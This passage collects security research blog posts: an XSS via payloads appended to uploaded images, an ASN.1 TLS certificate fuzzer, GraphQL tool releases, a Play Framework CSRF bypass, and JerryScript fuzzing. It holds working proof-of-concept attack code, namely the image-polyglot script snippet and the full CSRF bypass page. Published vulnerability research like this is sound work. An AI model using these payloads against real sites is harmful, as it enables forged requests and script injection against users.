Payload concatenated at the end of the image (after 0xFFD9 for JPGs or IEND for PNGs)

This technique will only work if no transformations are performed on the uploaded image, since only the image content is processed.

JPG having the plain XSS alert() payload after the trailing 0xFFD9 chunk
PNG having the plain XSS alert() payload after the trailing IEND chunk

As the name suggests, the trick involves appending the JavaScript payload at the end of the image format.
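
A minimal sketch of the append trick (filenames are placeholders):

# Append a script payload after the image's end-of-image marker.
# Most viewers and parsers still treat the result as a valid image.
payload = b"<script>alert(document.domain)</script>"
with open("clean.jpg", "rb") as f:
    data = f.read()
with open("poly.jpg", "wb") as f:
    f.write(data + payload)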

Payload in PNG’s iDAT

In PNGs, the IDAT chunk stores the pixel information. Depending on the transformations applied, you may be able to directly insert your raw payload in the IDAT chunks, or you may try to bypass the resize and re-sampling operations. Google Scholar only generated JPG pictures, so I could not leverage this technique.

Payload in JPG’s ECS

In the JFIF standard, the entropy-coded data segment (ECS) contains the output of the raw Huffman-compressed bitstream which represents the Minimum Coded Unit (MCU) that comprises the image data. In theory, it is possible to position our payload in this segment, but there are no guarantees that our payload will survive the transformation applied by the image library on the server. Creating a JPG image resistant to the transformations caused by the library was a process of trial and error.

As a starting point I crafted a “base” image with the same quality factors as the images resulting from the conversion. For this I ended up using this image having 0-length-string EXIFs. Even though having the payload positioned at a variable offset from the beginning of the section did not work, I found that when processed by Google Scholar the first bytes of the image’s ECS section were kept if separated by a pattern of 0x00 and 0x14 bytes.

Hexadecimal view of the JFIF structure, with the payload visible in the ECS section

From here it took me a little time to find the right sequence of bytes allowing the payload to survive the transformation, since the majority of user agents were not tolerating low-value bytes in the script tag definition of the page. For anyone interested, we have made available the images embedding the onclick and mouseover events. Our image library test suite is available on Github as doyensec/StandardizedImageProcessingTest.

Exploitation result of the XSS PoC on Scholar

Timeline

  • [2019-09-28] Reported to Google VRP
  • [2019-09-30] Google’s VRP requested a PoC
  • [2019-10-04] Provided PoC #1
  • [2019-10-10] Google’s VRP requested a different payload for PoC
  • [2019-10-11] Provided PoC #2
  • [2019-11-05] Google’s VRP confirmed the issue in 2 endpoints, rewarded $6267.40
  • [2019-11-19] Google’s VRP found another XSS using the same technique, rewarded an additional $3133.70

Fuzzing TLS certificates from their ASN.1 grammar

13 May 2020 at 22:00

A good part of my research time at Doyensec was devoted to building a flexible ASN.1 grammar-based fuzzer for testing TLS certificate parsers. I learned a lot in the process, but I often struggled to find good resources on these topics. In this blogpost I want to give a high-level overview of the problem, the approach I’m taking, and some pointers which might hopefully save a little time for other fellow security researchers.

Let’s start with some basics.

What is a TLS certificate?

A TLS certificate is a DER-encoded object conforming to the ASN.1 grammar and constraints defined in RFC 5280, which is based on the ITU X.509 standard.

That’s a lot of information to unpack, let’s take it one piece at a time.

ASN.1

ASN.1 (Abstract Syntax Notation One) is a grammar used to define abstract objects. You can think of it as a much older and more complicated version of Protocol Buffers. ASN.1 however does not define an encoding, which is left to other standards. This language was designed by ITU and it is extremely powerful and general purpose.

This is how a message in a chat protocol might be defined:

Message ::= SEQUENCE {
    senderId     INTEGER,
    recipientId  INTEGER,
    message      UTF8String,
    sendTime     GeneralizedTime,
    ...
}

At first sight, ASN.1 might even seem quite simple and intuitive. But don’t be fooled! ASN.1 contains a lot of vestigial and complex features. For a start, it has ~13 string types. Constraints can be placed on fields: for instance, integers and string sizes can be restricted to an acceptable range (e.g. INTEGER (0..65535)).

The real complexity beasts, however, are information objects, parametrization and tabular constraints. Information objects allow the definition of templates for data types, together with a grammar to declare instances of that template (oh yeah… defining a grammar within a grammar!).

This is how a template for different message types could be defined:

-- Definition of the MESSAGE-CLASS information object class
MESSAGE-CLASS ::= CLASS {
    messageTypeId INTEGER UNIQUE
    &payload      [1] OPTIONAL,
    ...
}
WITH SYNTAX {
    MESSAGE-TYPE-ID  &messageTypeId
    [PAYLOAD    &payload]
}

-- Definition of some message types
TextMessageKinds MESSAGE-CLASS ::= {
    -- Text message
    {MESSAGE-TYPE-ID 0, PAYLOAD UTF8String}
    -- Read ACK (no payload)
  | {MESSAGE-TYPE-ID 1, PAYLOAD Sequence { ToMessageId INTEGER } }
}

MediaMessageKinds MESSAGE-CLASS ::= {
    -- JPEG
    {MESSAGE-TYPE-ID 2, PAYLOAD OctetString}
}

Parametrization allows the introduction of parameters in the specification of a type:

Message {MESSAGE-CLASS : MessageClass} ::= SEQUENCE {
    messageId     INTEGER,
    senderId      INTEGER,
    recipientId   INTEGER,
    sendTime      GeneralizedTime,
    messageTypeId MESSAGE-CLASS.&messageTypeId ({MessageClass}),
    payload       MESSAGE-CLASS.&payload ({MessageClass} {@messageTypeId})
}

While a complete overview of the format is not within the scope of this post, a very good entry-level, but quite comprehensive, resource I found is this ASN1 Survival guide. The nitty-gritty details can be found in the ITU standards X.680 to X.683.

Powerful as it may be, ASN.1 suffers from a large practical problem - it lacks a wide choice of compilers (parser generators), especially non-commercial ones. Most of them do not implement advanced features like information objects. This means that, more often than not, data structures defined using ASN.1 are serialized and deserialized by handcrafted code instead of an autogenerated parser. This is also true for many libraries handling TLS certificates.

DER

DER (Distinguished Encoding Rules) is an encoding used to translate an ASN.1 object into bytes. It is a simple Tag-Length-Value format: each element is encoded by appending its type (tag), the length of the payload, and the payload itself. Its rules ensure there is only one valid representation for any given object, a useful property when dealing with digital certificates that must be signed and checked for anomalies.

The details of how DER works are not relevant to this post. A good place to start is here.
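
Still, a tiny hand-assembled example makes the Tag-Length-Value idea concrete (encoding the ASN.1 value INTEGER 5):

# DER encoding of INTEGER 5: tag, length of the payload, payload.
tag = b"\x02"                  # universal tag 2 = INTEGER
value = b"\x05"                # content octets
length = bytes([len(value)])   # short-form length
der = tag + length + value
print(der.hex())               # 020105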

RFC 5280 and X.509

The format of the digital certificates used in TLS is defined in some RFCs, most importantly RFC 5280 (and then in RFC 5912, updated for ASN.1 2002). The specification is based on the ITU X.509 standard.

This is what the outermost layer of a TLS certificate contains:

Certificate  ::=  SEQUENCE  {
    tbsCertificate       TBSCertificate,
    signatureAlgorithm   AlgorithmIdentifier,
    signature            BIT STRING  
}

TBSCertificate  ::=  SEQUENCE  {
    version         [0]  Version DEFAULT v1,
    serialNumber         CertificateSerialNumber,
    signature            AlgorithmIdentifier,
    issuer               Name,
    validity             Validity,
    subject              Name,
    subjectPublicKeyInfo SubjectPublicKeyInfo,
    issuerUniqueID  [1]  IMPLICIT UniqueIdentifier OPTIONAL,
                         -- If present, version MUST be v2 or v3
    subjectUniqueID [2]  IMPLICIT UniqueIdentifier OPTIONAL,
                         -- If present, version MUST be v2 or v3
    extensions      [3]  Extensions OPTIONAL
                         -- If present, version MUST be v3 --
}

You may recognize some of these fields from inspecting a certificate using a browser integrated viewer.

Doyensec X509 certificate

Finding out what exactly should go inside a TLS certificate and how it should be interpreted was not an easy task - specifications were scattered inside a lot of RFCs and other standards, sometimes with partial or even conflicting information. Some documents from the recent past offer a good insight into the number of contradictory interpretations. Nowadays there seems to be more convergence, and a good place to start when looking for how a TLS certificate should be handled is the RFCs together with a couple of widely used TLS libraries.

Fuzzing TLS starting from ASN.1

Previous work

All the high profile TLS libraries include some fuzzing harnesses directly in their source tree and most are even continuously fuzzed (like LibreSSL which is now included in oss-fuzz thanks to my colleague Andrea). Most libraries use tried-and-tested fuzzers like AFL or libFuzzer, which are not encoding or syntax aware. This very likely means that many cycles are wasted generating and testing inputs which are rejected early by the parsers.

X.509 parsers have been fuzzed using many approaches. Frankencert, for instance, generates certificates by combining parts from existing ones, while CertificateFuzzer uses a hand-coded grammar. Some fuzzing efforts are more targeted towards discovering memory-corruption types of bugs, while others are more geared towards discovering logic bugs, often comparing the behavior of multiple parsers side by side to detect inconsistencies.

ASN1Fuzz

I wanted a tool capable of generating valid inputs from an ASN.1 grammar, so that I can slightly break them and hopefully find some vulnerabilities. I couldn’t find any tool accepting ASN.1 grammars, so I decided to build one myself.

After a lot of experimentation and three full rewrites, I now have a pipeline that generates valid X509 certificates, which looks like this:

     +-------+
     | ASN.1 |
     +---+---+
         |
      pycrate
         |
 +-------v--------+        +--------------+
 | Python classes |        |  User Hooks  |
 +-------+--------+        +-------+------+
         |                         |
         +-----------+-------------+
                     |
                 Generator
                     |
                     |
                 +---v---+
                 |       |
                 |  AST  |
                 |       |
                 +---+---+
                     |
                  Encoder
                     |
               +-----v------+
               |            |
               |   Output   |
               |            |
               +------------+

First, I compile the ASN.1 grammar using pycrate, one of the few FOSS compilers that support most of the advanced features of ASN.1.

The output of the compiler is fed into the Generator. With a lot of introspection inside the pycrate classes, this component generates random ASTs conforming to the input grammar. The ASTs can be fed to an encoder (e.g. DER) to create a binary output suitable for being tested with the target application.

Certificates produced like this would not be valid, because many constraints are not encoded in the syntax. Moreover, I wanted to give the user total freedom to manipulate the generator behavior. To solve this problem I developed a handy hooking system which allows overrides at any point in the generator:

from pycrate_asn1dir.X509_2016 import AuthenticationFramework
from generator import Generator

spec = AuthenticationFramework.Certificate
cert_generator = Generator(spec)

@cert_generator.value_hook("Certificate/toBeSigned/validity/notBefore/.*")
def generate_notBefore(generator: Generator, node):
    now = int(time.time())
    start = now - 10 * 365 * 24 * 60 * 60  # 10 years ago
    return random.randint(start, now)

@cert_generator.node_hook("Certificate/toBeSigned/extensions/_item_[^/]*/" \
                          "extnValue/ExtnType/_cont_ExtnType/keyIdentifier")
def force_akid_generation(generator: Generator, node):
    # keyIdentifier should be present unless the certificate is self-signed
    return generator.generate_node(node, ignore_hooks=True)

@cert_generator.value_hook("Certificate/signature")
def generate_signature(generator: Generator, node):
    # (... compute signature ...)
    return (sig, siglen)

The AST generated by this pipeline can be already used for differential testing. For instance, if a library accepts the certificate while others don’t, there may be a problem that requires manual investigation.

In addition, the ASTs can be mutated using a custom mutator for AFL++ which performs random operations on the tree.

ASN1Fuzz is currently research-quality code, but I do aim to open source it at some point in the future. Since the generation starts from ASN.1 grammars, the tool is not limited to generating TLS certificates, and it could be leveraged to fuzz a plethora of other protocols.

Stay tuned for the next blog post where I will present the results from this research!

InQL Scanner v2 is out!

10 June 2020 at 22:00

InQL dyno-mites release

After the public launch of InQL we received an overwhelming response from the community. We’re excited to announce a new major release available on Github. In this version (codenamed dyno-mites), we have introduced a few cool features and a new logo!

InQL Logo

Jython Standalone GUI

As you might know, InQL can be used as a stand-alone tool, or as a Burp Suite extension (available for both Professional and Community editions). Using GraphQL built-in introspection query, the tool collects queries, mutations, subscriptions, fields, arguments, etc to automatically generate query templates that can be used for QA / security testing.

In this release, we introduced a Jython standalone GUI similar to the Burp one:

$ brew install jython
$ jython -m pip install inql
$ jython -m inql

Advanced Query Editor

Many users have asked for syntax highlighting and code completion. Et voilà!

InQL GraphiQL

InQL v2 includes an embedded GraphiQL server. This server works as a proxy and handles all the requests, enhancing them with authorization headers. GraphiQL server improves the overall InQL experience by providing an advanced query editor with autocompletion and other useful features. We also introduced stubbing of introspection queries when introspection is not available.

We imagine people working between GraphiQL, InQL, and other Burp Suite tools, hence we included a custom “Send to GraphiQL” / “Send to Repeater” flow to be able to move queries back and forth between the tools.

InQL v2 Flow

Tabbed Editor with Multi-Query and Variables support

But that’s not all. On the Burp Suite extension side, InQL now handles batched queries and searching inside queries.

InQL v2 Editor

This was possible by re-engineering the editor in use (i.e. the default Burp text editor) and including a new tabbed interface able to sync between multiple representations of these queries.

BApp Store

Finally, InQL is now available on the Burp Suite’s BApp store so that you can easily install the extension from within Burp’s extension tab.

Stay tuned!

In just three months, InQL has become the go-to utility for GraphQL security testing. We received a lot of positive feedback and decided to double down on the development. We will keep improving the tool based on users’ feedback and the experience we gain through our GraphQL security testing services.

This project was crafted with love in the Doyensec Research Island.

CSRF Protection Bypass in Play Framework

19 August 2020 at 22:00

This blog post illustrates a vulnerability affecting the Play framework that we discovered during a client engagement. This issue allows a complete Cross-Site Request Forgery (CSRF) protection bypass under specific configurations.

In their own words, the Play Framework is a high velocity web framework for Java and Scala. It is built on Akka, which is a toolkit for building highly concurrent, distributed, and resilient message-driven applications for Java and Scala.

Play is a widely used framework and is deployed on web platforms for both large and small organizations, such as Verizon, Walmart, The Guardian, LinkedIn, Samsung and many others.

Old school anti-CSRF mechanism

In older versions of the framework, CSRF protection was provided by an insecure baseline mechanism - even when CSRF tokens were not present in the HTTP requests.

This mechanism was based on the basic differences between Simple Requests and Preflighted Requests. Let’s explore the details of that.

A Simple Request follows a strict ruleset. Whenever these rules are followed, the user agent (e.g. a browser) won’t issue an OPTIONS preflight request, even if the request is made through XMLHttpRequest. All rules and details can be found on this Mozilla Developer page, although we are primarily interested in the Content-Type ruleset.

The Content-Type header for simple requests can contain one of three values:

  • application/x-www-form-urlencoded
  • multipart/form-data
  • text/plain

If you specify a different Content-Type, such as application/json, then the browser will send an OPTIONS request to verify that the web server allows such a request.

Now that we understand the differences between preflighted and simple requests, we can continue onwards to understand how Play used to protect against CSRF attacks.

In older versions of the framework (up to and including version 2.5), a blacklist approach on the received Content-Type header was used as a CSRF prevention mechanism.

In the 2.8.x migration guide, we can see how users could restore Play’s old default behavior if required by legacy systems or other dependencies:

application.conf

play.filters.csrf {
  header {
    bypassHeaders {
      X-Requested-With = "*"
      Csrf-Token = "nocheck"
    }
    protectHeaders = null
  }
  bypassCorsTrustedOrigins = false
  method {
    whiteList = []
    blackList = ["POST"]
  }
  contentType.blackList = ["application/x-www-form-urlencoded", "multipart/form-data", "text/plain"]
}

In the snippet above we can see the core of the old protection. The contentType.blackList setting contains three values, which are identical to the content types of “simple requests”. This has been considered a valid (although not ideal) protection, since the following scenarios are prevented:

  • attacker.com embeds a <form> element which posts to victim.com
    • Form allows form-urlencoded, multipart or plain, which are all blocked by the mechanism
  • attacker.com uses XHR to POST to victim.com with application/json
    • Since application/json is not a “simple request”, an OPTIONS will be sent and (assuming a proper configuration) CORS will block the request
  • victim.com uses XHR to POST to victim.com with application/json
    • This works as it should, since the request is not cross-site but within the same domain

Hence, you now have CSRF protection. Or do you?

Looking for a bypass

Armed with this knowledge, the first thing that comes to mind is that we need to make the browser issue a request that does not trigger a preflight and that does not match any values in the contentType.blackList setting.

The first thing we did was map out requests that we could modify without sending an OPTIONS preflight. This came down to a single request: Content-Type: multipart/form-data

This appeared immediately interesting thanks to the boundary value: Content-Type: multipart/form-data; boundary=something

The description can be found here:

For multipart entities the boundary directive is required, which consists of 1 to 70 characters from a set of characters known to be very robust through email gateways, and not ending with white space. It is used to encapsulate the boundaries of the multiple parts of the message. Often, the header boundary is prepended with two dashes and the final boundary has two dashes appended at the end.

So, we have a field that can actually be modified with plenty of different characters and it is all attacker-controlled.

Now we need to dig deep into the parsing of these headers. In order to do that, we need to take a look at Akka HTTP which is what the Play framework is based on.

Looking at HttpHeaderParser.scala, we can see that these headers are always parsed:

private val alwaysParsedHeaders = Set[String](
    "connection",
    "content-encoding",
    "content-length",
    "content-type",
    "expect",
    "host",
    "sec-websocket-key",
    "sec-websocket-protocol",
    "sec-websocket-version",
    "transfer-encoding",
    "upgrade"
)

And the parsing rules can be seen in HeaderParser.scala which follows RFC 7230 Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing, June 2014.

def `header-field-value`: Rule1[String] = rule {
  FWS ~ clearSB() ~ `field-value` ~ FWS ~ EOI ~ push(sb.toString)
}

def `field-value` = {
  var fwsStart = cursor
  rule {
    zeroOrMore(`field-value-chunk`).separatedBy { // zeroOrMore because we need to also accept empty values
      run { fwsStart = cursor } ~ FWS ~ &(`field-value-char`) ~ run { if (cursor > fwsStart) sb.append(' ') }
    }
  }
}

def `field-value-chunk` = rule { oneOrMore(`field-value-char` ~ appendSB()) }

def `field-value-char` = rule { VCHAR | `obs-text` }

def FWS = rule { zeroOrMore(WSP) ~ zeroOrMore(`obs-fold`) }

def `obs-fold` = rule { CRLF ~ oneOrMore(WSP) }

If these parsing rules are not obeyed, the value will be set to None. Perfect! That is exactly what we need to bypass the CSRF protection: a request that the browser still treats as “simple”, but whose Content-Type is parsed to None and therefore never matches the blacklist.

How do we actually forge a request that is allowed by the browser, but it is considered invalid by the Akka HTTP parsing code?

We decided to let fuzzing answer that, and quickly discovered that the following transformation worked: Content-Type: multipart/form-data; boundary=--some;randomboundaryvalue

An extra semicolon inside the boundary value would do the trick and mark the request as illegal:

POST /count HTTP/1.1
Host: play.local:9000
...
Content-Type: multipart/form-data;boundary=------;---------------------139501139415121
Content-Length: 0

Response:

HTTP/1.1 200 OK
...
Content-Type: text/plain; charset=UTF-8
Content-Length: 1

5

This is also confirmed by looking at the logs of the server in development mode:

a.a.ActorSystemImpl - Illegal header: Illegal 'content-type' header: Invalid input 'EOI', exptected tchar, OWS or ws (line 1, column 74): multipart/form-data;boundary=------;---------------------139501139415121

And by instrumenting the Play framework code to print the value of the Content-Type:

Content-Type: None

Finally, we built the following proof-of-concept and notified our client (along with the Play framework maintainers):

<html>
    <body>
        <h1>Play Framework CSRF bypass</h1>
        <button type="button" onclick="poc()">PWN</button> <p id="demo"></p>
        <script>
        function poc() {
            var xhttp = new XMLHttpRequest();
            xhttp.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {
                    document.getElementById("demo").innerHTML = this.responseText;
                }
            };
            xhttp.open("POST", "http://play.local:9000/count", true);
            xhttp.setRequestHeader(
                "Content-type",
                "multipart/form-data; boundary=------;---------------------139501139415121"
            );
            xhttp.withCredentials = true;
            xhttp.send("");
        }
        </script>
    </body>
</html>

Credits & Disclosure

This vulnerability was discovered by Kevin Joensen and reported to the Play framework via [email protected] on April 24, 2020. This issue was fixed on Play 2.8.2 and 2.7.5. CVE-2020-12480 and all details have been published by the vendor on August 10, 2020. Thanks to James Roper of Lightbend for the assistance.

Fuzzing JavaScript Engines with Fuzzilli

8 September 2020 at 22:00

Background

As part of my research at Doyensec, I spent some time trying to understand current fuzzing techniques, which could be leveraged against the popular JavaScript engines (JSE) with a focus on V8. Note that I did not have any prior experience with fuzzing JSEs before starting this journey.

Dharma

My experimentation started with a context-free grammar (CFG) generator: Dharma. I quickly realized that the grammar rules for generating valid JavaScript code that does something interesting are too complicated. Type confusion and JIT engine bugs were my primary focus, however, most of the generated code was syntactically incorrect. Every statement was wrapped in a try/catch block to deal with the incorrect code. After a few days of fuzzing, I was only able to find out-of-memory (OOM) bugs. If you want to read more about V8 JIT and Dharma, I recommend this thoughtful research.

Dharma allows you to specify three sections for various purposes. The first one, variable, lets you define variables that are later used in the value section. The last one, variance, is commonly used to specify the starting symbol for expanding the CFG tree.

The linkage is implemented inside the value section. A nice feature of Dharma is that you only define the assignment rules or function invocations there, and the variables are automatically created when needed. However, if we assign a variable of type A to one of a different type B, we have to include all the type A rules inside the type B object.

Here is an example of such rule:

try { !TYPEDARRAY! = !ARRAYBUFFER!.slice(!ANY_FUNCTION!, !ANY_FUNCTION!) } catch (e) {};

As you can imagine, without writing an additional library, the code quickly becomes complicated and clumsy.

Fuzzing with coverage is mandatory when targeting popular software, as a pure blackbox approach only scratches the attack surface. Coverage can be easily obtained when the binary is compiled with a specific Clang (compiler frontend, part of the LLVM infrastructure) flag. Part of the output can be seen in the picture below. In my case, it was only useful for manual code review and grammar adjustment, as there was no convenient way to implement a mutator over the JavaScript source code.

Coverage Report for V8

Fuzzilli

As an alternative approach, I started to play with Fuzzilli, which I think is incredible and still a very underrated fuzzer, implemented by Samuel Groß (aka Saelo). Fuzzilli uses an intermediate representation (IR) language called FuzzIL, which is perfectly suitable for mutating. Moreover, any program in FuzzIL could always be converted (lifted) to a valid JavaScript code.

At that time, the supported targets were V8, SpiderMonkey, and JavaScriptCore. As these engines continuously undergo widespread fuzzing, I instead decided to implement support for a different JavaScript Engine. I was also interested in the communication protocol between the fuzzer and the engine, so I considered expanding this fuzzer to be an excellent exercise.

I decided to add support for JerryScript. In the past years, numerous security issues have been discovered on this target by Fuzzinator, which uses the ANTLR v4 testcase generator Grammarinator. Those bugs were investigated and fixed, so I wanted to see if Fuzzilli could find something new.

Fuzzilli Basics

REPRL

The best available high-level documentation about Fuzzilli is Samuel’s Masters Thesis, where it was introduced, and I strongly recommend reading it as this article summarizes some of the novel ideas.

Many modern fuzzer architectures use a Forkserver. The idea behind it is to run the program until the initialization is complete, but before it processes any input. Right after that, the input from the fuzzer is read and passed to a newly forked child. The overhead is low since the initialization occurs only once, or whenever a restart is needed (e.g. in the case of continuous memory leaks).

Fuzzilli uses the REPRL approach, which saves the overhead caused by fork(); the measured execution rate per sample can be ~7 times faster. The JSE engine is modified to read the input from the fuzzer and, after it executes the sample, to report the coverage. The crucial part is resetting the engine state between samples, which is normally not done since the engine keeps the context of already defined variables. In contrast with the Forkserver approach, we need rudimentary knowledge of the engine: it is useful to know how the engine’s string representation is internally implemented in order to feed the input or add additional commands.

Coverage

LLVM provides a convenient way to obtain edge coverage. By passing the -fsanitize-coverage=trace-pc-guard compiler flag to Clang, we receive a pointer to the start and end of the guard regions, which are initialized with the guard numbers, as described in the LLVM documentation:

extern "C" void __sanitizer_cov_trace_pc_guard_init(uint32_t *start,
                                                    uint32_t *stop) {
  static uint64_t N;  // Counter for the guards.
  if (start == stop || *start) return;  // Initialize only once.
  printf("INIT: %p %p\n", start, stop);
  for (uint32_t *x = start; x < stop; x++)
    *x = ++N;  // Guards should start from 1.
}

The guard regions are included in the JSE target. This means that the JavaScript engine must be modified to accommodate these changes. Whenever a branch is executed, the __sanitizer_cov_trace_pc_guard callback is called. Fuzzilli uses a POSIX shared memory object (shmem) to avoid the overhead when passing the data to the parent process. Shmem represents a bitmap, where the visited edge is set and, after each JavaScript input pass, the edge guards are reinitialized.

Generation

We are not going to repeat the program generation algorithms, as they are closely described in the thesis. The surprising fact is that all the programs stem from this simple JavaScript by cleverly applying multiple mutators:

Object()

Integration with JerryScript

To add a new target, several modifications for Fuzzilli should be implemented. From a high level, the REPRL pseudocode is described here.

As we already mentioned, the JavaScript engine must be modified to conform to Fuzzilli’s protocol. To keep the same code standards and logic, we recommend adding a custom command line parameter to the engine. If we run the interpreter without it, it behaves normally. Otherwise, it uses the hardcoded descriptor numbers to let the parent process know that the interpreter is ready to process our input.

Fuzzilli internally uses a custom command, by default called fuzzilli, which the interpreter should also implement. The first parameter represents the operation - it can be FUZZILLI_CRASH or FUZZILLI_PRINT. The former is used to check that segmentation faults can be intercepted, while the latter (optional) is used to print the output passed as an argument. By design, the fuzzer refuses to run when some of these checks fail, e.g. when the FUZZILLI_CRASH operation is not implemented.

The code is very similar between different targets, as you can see in the patch for JerryScript that we submitted.

For a basic setup, one needs to write a short profile file stored in Sources/FuzzilliCli/Profiles/. Here we can specify additional builtins specific to the engine, arguments, or thanks to the recent contribution from WilliamParks also the ECMAScriptVersion.

Results

By integrating Fuzzilli with JerryScript, Doyensec was able to identify multiple bugs reported over the course of four weeks through GitHub. All of these issues were fixed.

All issues were also added to the Fuzzilli Bug Showcase:

Fuzzilli Showcase

Fuzzilli is by design efficient against targets with JIT compilers. It can abuse the non-linear execution flow by generating nested callbacks, Prototypes or Proxy objects, where the state of a different object could be modified. Samples produced by Fuzzilli are specifically generated to incorporate these properties, as required for the discovery of type confusion bugs.

This behavior could be easily seen in the Issue #3836. As in most cases, the proof of concept generated by Fuzzilli is very simple:

function main() {
    var v3 = new Float64Array(6);
    var v4 = v3.buffer;
    v4.constructor = Uint8Array;
    var v5 = new Float64Array(v3);
}
main();

This could be rewritten without changing the semantics to an even simpler code:

var v1 = new Float64Array(6);
v1.buffer.constructor = Uint8Array;
new Float64Array(v1);

The root cause of this issue is described in the fix.

In JavaScript, when a typed array like Float64Array is created, its raw binary data buffer can be accessed via the buffer property, which is of type ArrayBuffer. Here, however, the constructor was later altered to the typed array view Uint8Array. During the initialization, the engine was expecting an ArrayBuffer instead of a typed array: when calling the ecma_arraybuffer_get_buffer function, the typed array pointer was cast to ArrayBuffer. Note that this is possible since asserts are removed in production builds. This caused the type confusion bug on line 196.

Consequently, the destination buffer dst_buf_p contained an incorrect pointer, and we can observe the resulting memory corruption while triaging in gdb:

Program received signal SIGSEGV, Segmentation fault.
ecma_typedarray_create_object_with_typedarray (typedarray_id=ECMA_FLOAT64_ARRAY, element_size_shift=<optimized out>, proto_p=<optimized out>, typedarray_p=0x5555556bd408 <jerry_global_heap+480>)
    at /home/jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c:655
655	    memcpy (dst_buf_p, src_buf_p, array_length << element_size_shift);
(gdb) x/i $rip
=> 0x55555557654e <ecma_op_create_typedarray+346>:	rep movsb %ds:(%rsi),%es:(%rdi)
(gdb) i r rdi
rdi            0x3004100020008     844704103137288

Some of the issues, including the one mentioned above, could probably be escalated from Denial of Service to Code Execution. Because of time constraints and the little added value, we have not tried to implement a working exploit.

I want to thank Saelo for including my JerryScript patch into Fuzzilli. And many thanks to Doyensec for the funded 25% research time, which made this project possible.

InQL Scanner v3 - Just Released!

18 November 2020 at 23:00

We’re very happy to announce that a new major release of InQL is now available on our Release Page.

InQL Logo

If you’re not familiar, InQL is a security testing tool for GraphQL technology. It can be used as a stand-alone script or as a Burp Suite extension.

By combining InQL v3 features with the ability to send query templates to Burp’s Repeater, we’ve made it very easy to exploit vulnerabilities in GraphQL queries and mutations. This drastically lowers the bar for security research against GraphQL tech stacks.

Here’s a short intro for major features that have been implemented in version 3.0:

New IIR (Introspection Intermediate Representation) and Precise Query Generation

InQL now leverages an internal introspection intermediate representation (IIR) to use details obtained from type introspection and generate arbitrarily nested queries with support for any scalar types, enumerations, arrays, and objects. IIR enables seamless “Send to Repeater” functionality from the Scanner to the other tool components (Repeater and GraphQL console).

New Cycles Detector

The new IIR allows us to inspect cycles in defined GraphQL schemas simply by accessing introspection-enabled endpoints. In this context, a cycle is a path in the GraphQL schema that uses recursive objects in a way that leads to unlimited nesting. The detection of cycles is incredibly useful and automates tedious testing procedures by employing graph solving algorithms. In some of our past client engagements, this tool was able to find millions of cycles in a matter of minutes.

New Request Timer

InQL 3.0.0 has an integrated Query Timer. The Query Timer is a reimagination of Request Timer, which can filter by query name and body. It is enabled by default and is especially useful in conjunction with the Cycles Detector. A tester can switch between GraphQL editor modes (Repeater and GraphiQL) to identify DoS queries. The Query Timer demonstrates the impact of attacking such vulnerable GraphQL endpoints by measuring each query’s execution time.

InQL Timer

Bugs fixes and future development

We’re really thankful to all of you for reporting issues in our previous releases. We have implemented various fixes for functional and UX bugs, including a tricky bug caused by a sudden Burp Suite change in the latest 2020.11 update.

InQL Twitter Issue

We’re excited to see the community embracing InQL as the “go-to” standard for GraphQL security testing. More features to come, so keep your requests and bug reports coming via our Github’s Issue Page. Your feedback is much appreciated!

This project was made with love in the Doyensec Research Island.

Novel Abuses On Wi-Fi Direct Mobile File Transfers

9 December 2020 at 23:00

The Wi-Fi Direct specification (a.k.a. “peer-to-peer” or “P2P” Wi-Fi) turned 10 years old this past April. This 802.11 extension has been available since Android 4.0 through a dedicated API that interfaces with the device’s built-in hardware, allowing devices to connect directly to each other via Wi-Fi without an intermediate access point. Multiple mobile vendors and early adopters of this technology quickly leveraged the standard to provide their products with a fast and reliable file transfer solution.

After almost a decade, the vast majority of mobile OEMs still rely on custom locked-in implementations for file transfer, even if large cross-vendor alliances (e.g. the “Peer-to-Peer Transmission Alliance”) and big players like Google (with the recent “Nearby Share” feature) are moving to change this in the near future.

During our research, three popular P2P file transfer implementations were studied (namely Huawei Share, LG SmartShare Beam, Xiaomi Mi Share) and all of them were found to be vulnerable due to an insecure shared design. While some groundbreaking research work attacking the protocol layer has already been presented by Andrés Blanco during Black Hat EU 2018, we decided to focus on the application layer of this particular class of custom UPnP service.

This blog post will cover the following topics:

  • A Recurrent Design Pattern
  • LG SmartShare Beam
  • Huawei Share
  • Xiaomi Mi Share
  • Conclusions

A Recurrent Design Pattern

In the majority of OEM solutions, mobile file transfer applications spawn two servers:

  • A File Transfer Controller or Client (FTC), which manages the majority of the pairing and transfer control flow
  • A File Transfer Server (FTS), which checks a session’s validity and serves the intended shared file

These two services are used for device discovery, pairing and sessions, authorization requests, and file transport functions. Usually they are implemented as classes of a shared parent application which orchestrate the entire transfer. These components are responsible for:

  1. Creating the Wi-Fi Direct network
  2. Using the standard UPnP phases to announce the device, the file service description (/description.xml), and events subscription
  3. Issuing a UPnP remote procedure call to create a transfer request with another peer
  4. Upon acceptance from the recipient, uploading the target file through an HTTP POST/PUT request to a defined location

An important consideration for the following abuses is that after a P2P Wi-Fi connection is established, its network interface (p2p-wlan0-0) is available to every application running on the user’s device that holds android.permission.INTERNET. Because of this, local apps can interact with the FTS and FTC services spawned by the file sharing applications on the local or remote device, opening the door to a multitude of attacks.

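As a way of example, the following minimal Node.js sketch shows the kind of interaction any co-located app could attempt against these services over the P2P interface (192.168.49.1 is the typical Wi-Fi Direct group owner address; the port and path are placeholders, since each vendor uses its own):

const http = require('http');

// Fetch the UPnP file service description announced by a connected peer.
// Address, port and path are illustrative and vendor-specific.
http.get('http://192.168.49.1:55003/description.xml', (res) => {
  let body = '';
  res.on('data', (chunk) => (body += chunk));
  res.on('end', () => console.log(res.statusCode, body));
}).on('error', console.error);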

LG SmartShare Beam

Smartshare is a stock LG solution to connect their phones to other devices using Wi-Fi (DLNA, Miracast) or Bluetooth (A2DP, OPP). The Beam feature is used for file transfer among LG devices.

Just like other similar applications, an FTS (FileTransferTransmitter in com.lge.wfds.service.send.tx) and an FTC (FileTransferReceiver in com.lge.wfds.service.send.rx) are spawned, listening on ports 54003 and 55003.

As an example, the following HTTP requests demonstrate the FTC and the FTS in action whenever a file transfer session between two parties is requested. First, the FTS performs a CreateSendSession SOAP action:

POST /FileTransfer/control.xml HTTP/1.1
Connection: Keep-Alive
HOST: 192.168.49.1:55003
Content-Type: text/xml; charset="utf-8"
Content-Length: 1025
SOAPACTION: "urn:schemas-wifialliance-org:service:FileTransfer:1#CreateSendSession"
 
<?xml version="1.0" encoding="UTF-8"?>
